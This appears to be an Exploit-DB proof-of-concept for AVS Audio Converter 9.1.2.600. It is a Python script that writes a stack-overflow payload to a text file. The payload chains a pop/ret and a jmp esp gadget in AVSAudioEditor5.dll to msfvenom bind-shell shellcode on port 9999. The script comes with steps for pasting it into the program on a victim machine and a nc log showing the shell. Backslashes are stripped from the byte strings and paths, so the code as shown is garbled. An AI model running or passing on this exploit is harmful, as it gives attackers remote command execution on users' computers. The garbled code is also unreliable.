AVS Audio Converter 9.1.2.600 – Stack Overflow (PoC)
# Exploit Title: AVS Audio Converter 9.1.2.600 - Stack Overflow (PoC)
# Date: December 2019-12-28
# Exploit Author: boku
# Original DoS: https://www.exploit-db.com/exploits/47788
# Original DoS Author: ZwX
# Software Vendor: http://www.avs4you.com/
# Software Link: http://www.avs4you.com/avs-audio-converter.aspx
# Version: 9.1.2.600
# Tested on: Microsoft Windows 10 Home 1909(x86-64) - 10.0.18363 N/A Build 18363
# Microsoft Windows 7 Enterprise(x86-64) - 6.1.7601 Service Pack 1 Build 7601
#!/usr/bin/python
# Recreate:
# 1) Generate the 'bind9999.txt' payload using python 2.7.x on Kali Linux.
# 2) On the victim Windows machine, open the file 'bind9999.txt' with notepad, then Select-All > Copy.
# 3) Install & Open AVS Audio Converter 9.1.2.600.
# 4) Locate the textbox to the right of 'Output Folder:'; at the bottom of the main window.
# 5) Paste the copied payload from the 'bind9999.txt' file into the textbox.
# 6) Click the 'Browse...' button; to the right of the textbox.
# - The program will freeze & a bind shell will be listening on tcp port 9999; on all interfaces.
# Special thanks to: The Offsec Team, Corelan Team, Vivek/Pentester Academy Team, Skape
blt = '33[92m[33[0m+33[92m]33[0m ' # bash green success bullet
err = '33[91m[33[0m!33[91m]33[0m ' # bash red error bullet
File = 'bind9999.txt'
try:
# 0x00400000 [AVSAudioConverter.exe]
# 9.1.2.600 (C:Program Files (x86)AVS4YOUAVSAudioConverterAVSAudioConverter.exe)
# - The only module that has SafeSEH disabled.
# Base | Top | Rebase | SafeSEH | ASLR | NXCompat | OS Dll |
# 0x00400000 | 0x00f33000 | False | False | False | False | False |
# - Attempting a 3-byte SEH-handler overwrite will fail due to no exception being thrown.
offEdx = 'x41'*260
edx = 'x42x42x42x42' # EDX overwrite at 260 bytes. EDX=0x42424242
# SEH-Record overwrite at offset 264; the goal from here is to not throw an exception or we're screwed.
nSEH = 'x42'*4
SEH = 'x43'*4
# - If address at offset 308 is not readable, then the program will throw an exception at:
# 75F9ECE7 3806 cmp byte ptr ds:[esi], al
# [!] Access violation when reading [esi]
# - If we can get past this exception, we can overwrite EIP at offset 304.
# - [esi] must be successfully overwriten so we can put our payload after it.
offEip = 'x45'*32
# - AVSAudioEditor5.dll is the only other module with both ASLR & Rebase disabled.
# - The enabled SafeSEH blocks us from using it for a SEH overwrite, but we can still jump
# to it with a vanilla EIP overwrite; due to overwriting a return address on the stack.
# - After bypassing the ESI read exception, our stack will look like this after the EIP overwrite:
# ECX=0018FA60 ESP=0018FA60 (Stack locations will vary)
# 0018FA54 45454545 EEEE // [296]
# 0018FA58 45454545 EEEE // [300]
# 0018FA5C 1006563E V... // [304] eip var # Pointer to 'pop+ret'
# *0018FA60 00000000 .... // [308] esi var # our esi address gets replaced by 4 nulls
# 0018FA64 1006A438 8... // [312] jmpEsp var # Pointer to 'jmp esp'
# 0018FA68 E510EC10 .... // [316] fixStack var # ASM to fix the Stack so shellcode will work
# [AVSAudioEditor5.dll] (C:Program Files (x86)Common FilesAVSMediaActiveXAVSAudioEditor5.dll)
# Base | Top | Rebase | SafeSEH | ASLR | NXCompat | OS Dll |
# 0x10000000 | 0x100a1000 | False | True | False | False | False |
# 0x1006563e : pop esi # ret | ascii {PAGE_EXECUTE_READ} [AVSAudioEditor5.dll]
eip = 'x3ex56x06x10' # pop+ret
# - After pop+ret, ESP=0018FA68
esi = 'x10x10x08x10' # [AVSAudioEditor5.dll] | .data | RW
# 0x1006a438 : jmp esp | {PAGE_EXECUTE_READ} [AVSAudioEditor5.dll]
# - the esi var address is just a random, readable memory location that will not move; to bypass the exception.
jmpEsp = 'x38xa4x06x10' # jmp esp pointer
# EBP is 45454545 at this point. Needs to be fixed for most shellcode payloads to work properly.
fixStack = 'x83xECx10' # sub esp, 0x10
fixStack += 'x89xE5' # mov ebp, esp
fixStack += 'x83xECx60' # sub esp, 0x60
#msfvenom -p windows/shell_bind_tcp LPORT=9999 -v shellcode -a x86 --platform windows -b 'x00' --format python
# x86/shikata_ga_nai succeeded with size 355 (iteration=0)
shellcode = b""
shellcode += b"xbexd8x49x8dx72xd9xe5xd9x74x24xf4"
shellcode += b"x5ax31xc9xb1x53x31x72x12x83xeaxfc"
shellcode += b"x03xaax47x6fx87xb6xb0xedx68x46x41"
shellcode += b"x92xe1xa3x70x92x96xa0x23x22xdcxe4"
shellcode += b"xcfxc9xb0x1cx5bxbfx1cx13xecx0ax7b"
shellcode += b"x1axedx27xbfx3dx6dx3axecx9dx4cxf5"
shellcode += b"xe1xdcx89xe8x08x8cx42x66xbex20xe6"
shellcode += b"x32x03xcbxb4xd3x03x28x0cxd5x22xff"
shellcode += b"x06x8cxe4xfexcbxa4xacx18x0fx80x67"
shellcode += b"x93xfbx7ex76x75x32x7exd5xb8xfax8d"
shellcode += b"x27xfdx3dx6ex52xf7x3dx13x65xccx3c"
shellcode += b"xcfxe0xd6xe7x84x53x32x19x48x05xb1"
shellcode += b"x15x25x41x9dx39xb8x86x96x46x31x29"
shellcode += b"x78xcfx01x0ex5cx8bxd2x2fxc5x71xb4"
shellcode += b"x50x15xdax69xf5x5exf7x7ex84x3dx90"
shellcode += b"xb3xa5xbdx60xdcxbexcex52x43x15x58"
shellcode += b"xdfx0cxb3x9fx20x27x03x0fxdfxc8x74"
shellcode += b"x06x24x9cx24x30x8dx9dxaexc0x32x48"
shellcode += b"x5axc8x95x23x79x35x65x94x3dx95x0e"
shellcode += b"xfexb1xcax2fx01x18x63xc7xfcxa3xac"
shellcode += b"x17x88x42xd8x37xdcxddx74xfax3bxd6"
shellcode += b"xe3x05x6ex4ex83x4ex78x49xacx4exae"
shellcode += b"xfdx3axc5xbdx39x5bxdaxebx69x0cx4d"
shellcode += b"x61xf8x7fxefx76xd1x17x8cxe5xbexe7"
shellcode += b"xdbx15x69xb0x8cxe8x60x54x21x52xdb"
shellcode += b"x4axb8x02x24xcex67xf7xabxcfxeax43"
shellcode += b"x88xdfx32x4bx94x8bxeax1ax42x65x4d"
shellcode += b"xf5x24xdfx07xaaxeexb7xdex80x30xc1"
shellcode += b"xdexccxc6x2dx6exb9x9ex52x5fx2dx17"
shellcode += b"x2bxbdxcdxd8xe6x05xfdx92xaax2cx96"
shellcode += b"x7ax3fx6dxfbx7cxeaxb2x02xffx1ex4b"
shellcode += b"xf1x1fx6bx4exbdxa7x80x22xaex4dxa6"
shellcode += b"x91xcfx47"
payload = offEdx+edx+nSEH+SEH+offEip+eip+esi+jmpEsp+fixStack+shellcode
# offsets: 0 260 264 268 272 304 308 312 316 324
f = open(File, 'w') # open file for write
f.write(payload)
f.close() # close the file
print blt + File + " created successfully "
# root@kali# nc 9999
# Microsoft Windows [Version 6.1.7601]
# C:Program Files (x86)AVS4YOUAVSAudioConverter>
except:
print err + File + ' failed to create'
https://www.exploit-db.com/exploits/47810
Gloss